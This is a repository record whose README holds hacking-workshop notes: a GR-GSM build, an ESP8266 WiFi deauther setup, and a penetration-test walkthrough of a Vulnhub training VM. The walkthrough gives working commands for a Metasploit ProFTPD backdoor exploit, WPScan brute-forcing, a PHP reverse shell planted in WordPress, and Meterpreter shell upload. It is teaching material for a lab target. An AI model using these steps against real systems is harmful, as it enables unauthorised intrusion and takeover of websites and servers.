{"id":19807902,"url":"https://github.com/slayingripper/hacksocworkshop","last_synced_at":"2026-02-17T16:01:53.212Z","repository":{"id":170932653,"uuid":"170698892","full_name":"Slayingripper/hacksocworkshop","owner":"Slayingripper","description":"All the details of my presentation for those that fall behind ","archived":false,"fork":false,"pushed_at":"2019-03-01T23:32:48.000Z","size":13,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-11T00:18:25.337Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Slayingripper.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-02-14T13:52:14.000Z","updated_at":"2025-07-19T05:14:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"53e82c1e-e12d-42b5-afa5-dda3030dbc52","html_url":"https://github.com/Slayingripper/hacksocworkshop","commit_stats":null,"previous_names":["slayingripper/hacksocworkshop"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Slayingripper/hacksocworkshop","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Slayingripper","download_url":"https://codeload.github.com/Slayingripper/hacksocworkshop/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29549212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T14:33:00.708Z","status":"ssl_error","status_checked_at":"2026-02-17T14:32:58.657Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-12T09:12:18.992Z","updated_at":"2026-02-17T16:01:53.196Z","avatar_url":"https://github.com/Slayingripper.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# hacksoc28.3.19\nAll the details of my presentation for those that fall behind\n\nPre-requisites for the workshop(software)\n\nAny Linux distro \n\nArduino IDE (https://www.arduino.cc/en/main/software)\n\nWireshark (sudo apt-get install wireshark)(Ubuntu/Debian based) \n\nPython\n\n## GR-GSM(This requires an SDR and some time to compile)\n```\nsudo apt-get update \u0026\u0026 \\\nsudo apt-get install -y \\\n    cmake \\\n    autoconf \\\n    libtool \\\n    pkg-config \\\n    build-essential \\\n    python-docutils \\\n    libcppunit-dev \\\n    swig \\\n    doxygen \\\n    liblog4cpp5-dev \\\n    python-scipy \\\n    python-gtk2 \\\n    gnuradio-dev \\\n    gr-osmosdr \\\n    libosmocore-dev   \n```\n## Download GR-gsm and compile with (https://github.com/ptrkrysik/gr-gsm)\n```\ngit clone https://git.osmocom.org/gr-gsm\ncd gr-gsm\nmkdir build\ncd build\ncmake ..\nmkdir $HOME/.grc_gnuradio/ $HOME/.gnuradio/\nmake\nsudo make install\nsudo ldconfig\n```\n## Wifi Deauthentication using ESP8266\n(I will provide 4 Nodemcu's you can play around which are pre configured ) \nFirst we need to flash the NodeMcu using this tutorial (easier to follow the link)\nhttps://github.com/spacehuhn/esp8266_deauther/wiki/Installation\n\n\n## Pentest part \nThis pen test will cover tools like\n\nNmap\nZAP\nmetasploit\n\nYou are more than welcome to download the Vm and run this on your machine \nhttps://www.vulnhub.com/entry/basic-pentesting-1,216/\n\n\nFirstly open up Kali linux or any linux machine \n\n\n\nlets run an Nmap scan on the target machine(you can easily get this since the Vm has a gui by going to connection information)\n\n```\nnmap -p- -sS -Pn -n -vvv -oA nmap-host-ports \u003cmachine-ip\u003e\n```\nFor demostration purposes i will be using openVas to show some of the vulnabilities\n\nWe can see that port 21,22,80 are open\n(using openVas we can see that port 21 is exploitable)\n\nThis looks promising. Let’s try to exploit it with Metasploit.\n```\nmsfconsole\nsearch ProFTPD\nuse exploit/unix/ftp/proftpd_133c_backdoor\n```\n\n\nBingo! Found something. Let’s set the target’s IP.\n\n```\nset RHOST xxx.xxx.xxx.xxx\n```\n\nAnd run the exploit.\n\n```\nrun\nwhoami\n```\n\nFantastic WE JUST GAINED ROOT ACCESS \n\nNow that we have gained root access lets dig a little deeper and find some more fancy stuff!\n\n\n{we can skip this step since we already used Nmap but lets explore the GUI version}\nStart up Zenmap and scan against the target IP\n\nIt revealed a couple of open ports:\n\n    21 – ProFTPD (What we already exploited)\n    22 – OpenSSH\n    80 – HTTP with Apache\n    \nNow try and open the Targets IP address with a web browser \n\nNow open up your terminal again and start up a uniscan \nScan the given URL (-u http://\u003ctarget-ip\u003e) for vulnerabilities, enabling directory and dynamic checks (-qd):\n    \n```\nuniscan -u http://\u003ctarget-ip\u003e -qd \n```\nInteresting. This reveals a URL that we might want to have a deeper look at.\n\n\u003cTaget-ip\u003e/sercet/\n    \nAlso, some external hosts were found:\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-23-10_08_44.png\n\nAnd a test of http://\u003ctarget-ip\u003e/secret/wp-login.php reveals a WP-Login page. Bingo! Now the fun can begin.\n    \nAlright, we are a big step further now. The first thing I want to do now is run  WPScan against the site to enumerate potential users and find potential vulnerabilities.\n\n```\nwpscan --url http://\u003ctaget-ip\u003e/secret/\n```\n\nThe WPScan discovers a couple of vulnerabilities:\n\n    WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload – CVE-2017-17092\n    WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping – CVE-2017-17094\n    WordPress 4.3.0-4.9 – HTML Language Attribute Escaping – CVE-2017-17093\n    WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing – CVE-2017-17091\n    WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS) – CVE-2018-5776\n    WordPress \u003c= 4.9.4 – Application Denial of Service (DoS) (unpatched) – CVE-2018-6389\n    \n    \n But first, let’s run a user enumeration with WPScan.\n ```\n wpscan --url http://192.168.1.111/secret/ --enumerate u\n ```\n Admin as a username… Why not try admin/admin? Huh? Entering Username and Password redirects us somewhere else, a domain.\n \n That’s weird. Let’s figure out what’s up with that.\n\nAll links on the “Secret Blog” redirect to a domain named vtcsec, leaving us with a blank page. So if we want to click on a link on the Secret Blog, we get redirected, for example, to http://vtcsec/secret/index.php/2017/11/16/hello-world/\n\nHowever, if we replace http://vtcsec/ with http://192.168.1.111/secret/index.php/2017/11/16/hello-word/ we are able to access the site. \n\nNow to be able to run a brute-force attack against the WordPress site without error, we need to add 192.168.1.111 pointing to vtcsec into our hosts file.\n\n```\nnano /etc/hosts\n```\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-23-14_30_13.png\n\nWe can verify if that worked by clicking on a link on the http://\u003ctarget-ip\u003e/secret/ site again. And there we go, hit F5 to refresh the page and it starts loading correctly.\nWe now have access to the Admin Dashboard which gives us a host of new things to try.\n    \n    \nBut not so fast, what if the password wouldn’t have been admin/admin? We could have used wpscan to brute-force a couple of default passwords against it by running the command below.\n\n\n```\nwpscan --url http://vtcsec/secret/wp-login.php --username admin --wordlist /usr/share/wordlists/metasploit/http_default_pass.txt --wp-content-dir http://\u003ctarget-ip\u003e:80/secret/wp-content/ --threads 50\n\n```\n\nI used the http_default_pass.txt wordlist and it, sure enough, found the correct password as well.\n\n\n\n(This part will not work in this example but is a proof of concept)\nWe are going to add malicious code to the header.php page. I went to /usr/share/webshells/php and copy the code of php-reverse-shell.php\n\nOn your Attacking Computer go to Places -\u003e File System -\u003e usr -\u003e share -\u003e webshells -\u003e php and open php-reverse-shell.php\n\nCopy all of it’s content:\n\nNow I went to Appearance -\u003e Editor -\u003e Theme Header(header.php) in WordPress. I pasted the code at the bottom of the file and changed the IP to my attacking computer. You can delete the code that was in the file before. Also, I changed the port for good measure. Now I updated the file.\n\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-26-10_29_32.png\n\nNext, I need to start a listener on my attacking computer.\n\n```\nnc -lvp 443\n```\n\nOnce that is done, you just open http://http://vtcsec/secret/ once more and you will see that we get a connection on our listener.\n\nWe are logged in as the www-data User.\n\n### Using Metasploit to upload a malicious WordPress Plugin\n\nThe Metasploit Admin Shell Upload module sounds promising. Firing up Metasploit and configuring the module first.\n```\nmsfconsole\nuse exploit/unix/webapp/wp_admin_shell_upload\n````\n\nset up every thing like so \nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-26-14_20_19.png\n\n\nFinally run by typing\n\n```\nexploit\n```\n\nAnd boom! We got a Meterpreter shell\n\n\n### Using unix privilege escalation check to analyze the target\n\n\n\n\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslayingripper%2Fhacksocworkshop","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fslayingripper%2Fhacksocworkshop","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslayingripper%2Fhacksocworkshop/lists"}